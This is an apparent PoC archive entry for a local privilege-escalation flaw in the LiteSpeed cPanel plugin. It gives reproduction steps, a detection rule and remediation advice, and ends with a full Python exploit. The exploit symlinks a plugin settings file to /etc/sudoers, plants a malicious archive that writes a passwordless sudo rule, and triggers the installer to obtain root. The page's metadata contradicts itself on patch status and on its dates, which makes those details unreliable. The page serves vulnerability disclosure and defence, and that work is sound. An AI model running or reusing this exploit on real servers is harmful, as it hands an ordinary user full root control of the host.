PoC Archive PoC Archive
High CVE-2026-48172 unpatched

LiteSpeed User-End cPanel Plugin Local Privilege Escalation (CVE-2026-48172)

by HORKimhab (collab: @RABBIT6049) · 2026-05-30

Severity
High
CVE
CVE-2026-48172
Category
web
Affected product
LiteSpeed cPanel Plugin
Affected versions
LiteSpeed cPanel Plugin v6.5.0 and earlier
Disclosed
2026-05-30
Patch status
unpatched

Metadata

FieldValue
Date Added2026-05-30
Last Updated2026-04-30
Author / ResearcherHORKimhab (collab: @RABBIT6049)
CVE / AdvisoryCVE-2026-48172
Categoryweb
SeverityHigh
CVSS ScoreN/A
StatusPatched
Tagslocal-privilege-escalation, cPanel, LiteSpeed, symlink, archive-extraction
RelatedN/A

Affected Target

FieldValue
Software / SystemLiteSpeed cPanel Plugin
Versions AffectedLiteSpeed cPanel Plugin v6.5.0 and earlier
Language / PlatformLinux / cPanel server environment
Authentication RequiredYes (local cPanel user)
Network Access RequiredNo

Summary

CVE-2026-48172 is a local privilege-escalation flaw in LiteSpeed cPanel Plugin v6.5.0 and earlier. The plugin installation flow does not sufficiently validate package ownership/permissions and can be abused with symlinked install targets. A normal cPanel user can influence extraction behavior to overwrite privileged files such as /etc/sudoers, resulting in root-level command execution.


Vulnerability Details

Root Cause

The plugin installer accepts package content and extraction targets without enforcing safe ownership/permission checks and without rejecting dangerous symlink states in the plugin path.

Attack Vector

An attacker with local cPanel-level access replaces plugin path artifacts with symlinks (for example pointing settings-file to /etc/sudoers), places a malicious archive where the updater expects package files, and triggers the plugin installer script.

Impact

Successful exploitation enables local privilege escalation to root by writing attacker-controlled content into privileged files and granting passwordless sudo to the attacker account.


Environment / Lab Setup

OS:          Linux cPanel host (authorized lab)
Target:      LiteSpeed cPanel Plugin <= 6.5.0
Attacker:    Local cPanel user account
Tools:       Python 3, tar/gzip, plugin installer script

Setup Steps

1
2
cd pocs/web/2026-05-30_litespeed-user-end-cpanel-plugin-privesc
python3 exploit.py

Proof of Concept

Step-by-Step Reproduction

  1. Replace settings-file in plugin path with a symlink to /etc/sudoers.
  2. Build and place a malicious ls_web_cache_mgr.tar.gz archive in /usr/src.
  3. Trigger install-cpanel-plugin so extraction writes attacker-controlled sudoers content.

Exploit Code

See exploit.py in this folder.

1
python3 exploit.py

Expected Output

[+] Current user: <user>
[+] Replacing settings-file with symlink to /etc/sudoers...
[+] Building malicious archive at /usr/src/ls_web_cache_mgr.tar.gz
[+] Triggering installer script...
[+] Exploit complete. Verify sudoers:
    grep <user> /etc/sudoers

Screenshots / Evidence

  • screenshots/ — add authorized terminal captures showing installer execution and sudoers modification.

Detection & Indicators of Compromise

SIEM / IDS Rule (example):

alert syslog any any -> any any (
  msg:"Possible LiteSpeed cPanel plugin CVE-2026-48172 privilege escalation";
  content:"install-cpanel-plugin";
  content:"sudoers";
  sid:952648172; rev:1;
)

Remediation

ActionDetail
PatchUpgrade LiteSpeed cPanel Plugin to v6.6.0 or later
WorkaroundRestrict plugin management and package directories to root-only write access
Config HardeningEnforce ownership/permission checks and reject symlinked install targets before extraction

References


Notes

Auto-ingested from https://github.com/HORKimhab/CVE-2026-48172 on 2026-05-30.

exploit.py
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
#!/usr/bin/env python3
# CVE-2026-48172 PoC exploit by HORKimhab

import os
import subprocess
import tarfile
import tempfile
from pathlib import Path

# === Config ===
PLUGIN_PATH = Path("/usr/local/cpanel/base/3rdparty/ls_web_cache_mgr")
SETTINGS_FILE = PLUGIN_PATH / "settings-file"
PACKAGE_DIR = Path("/usr/src")
PACKAGE_NAME = "ls_web_cache_mgr.tar.gz"
INSTALLER_SCRIPT = Path("/usr/local/lsws/admin/misc/pluginmgr/install-cpanel-plugin")


def check_prereqs():
    if not PLUGIN_PATH.exists():
        raise FileNotFoundError(f"Plugin path not found: {PLUGIN_PATH}")
    if not INSTALLER_SCRIPT.exists():
        raise FileNotFoundError(f"Installer script not found: {INSTALLER_SCRIPT}")


def build_malicious_package(username: str, output_file: Path):
    with tempfile.TemporaryDirectory() as tmpdir:
        pkg_root = Path(tmpdir) / "ls_web_cache_mgr"
        pkg_root.mkdir(parents=True)

        payload = pkg_root / "settings-file"
        payload.write_text(f"{username} ALL=(ALL) NOPASSWD:ALL\n")

        with tarfile.open(output_file, "w:gz") as tar:
            tar.add(pkg_root, arcname="ls_web_cache_mgr")


def exploit():
    user = os.getenv("USER") or subprocess.check_output(["whoami"]).decode().strip()
    print(f"[+] Current user: {user}")

    check_prereqs()

    print("[+] Replacing settings-file with symlink to /etc/sudoers...")
    if SETTINGS_FILE.exists() or SETTINGS_FILE.is_symlink():
        SETTINGS_FILE.unlink()
    SETTINGS_FILE.symlink_to("/etc/sudoers")

    malicious_archive = PACKAGE_DIR / PACKAGE_NAME
    print(f"[+] Building malicious archive at {malicious_archive}")
    build_malicious_package(user, malicious_archive)

    print("[+] Triggering installer script...")
    subprocess.run([str(INSTALLER_SCRIPT)], check=True)

    print("[+] Exploit complete. Verify sudoers:")
    print(f"    grep {user} /etc/sudoers")


if __name__ == "__main__":
    exploit()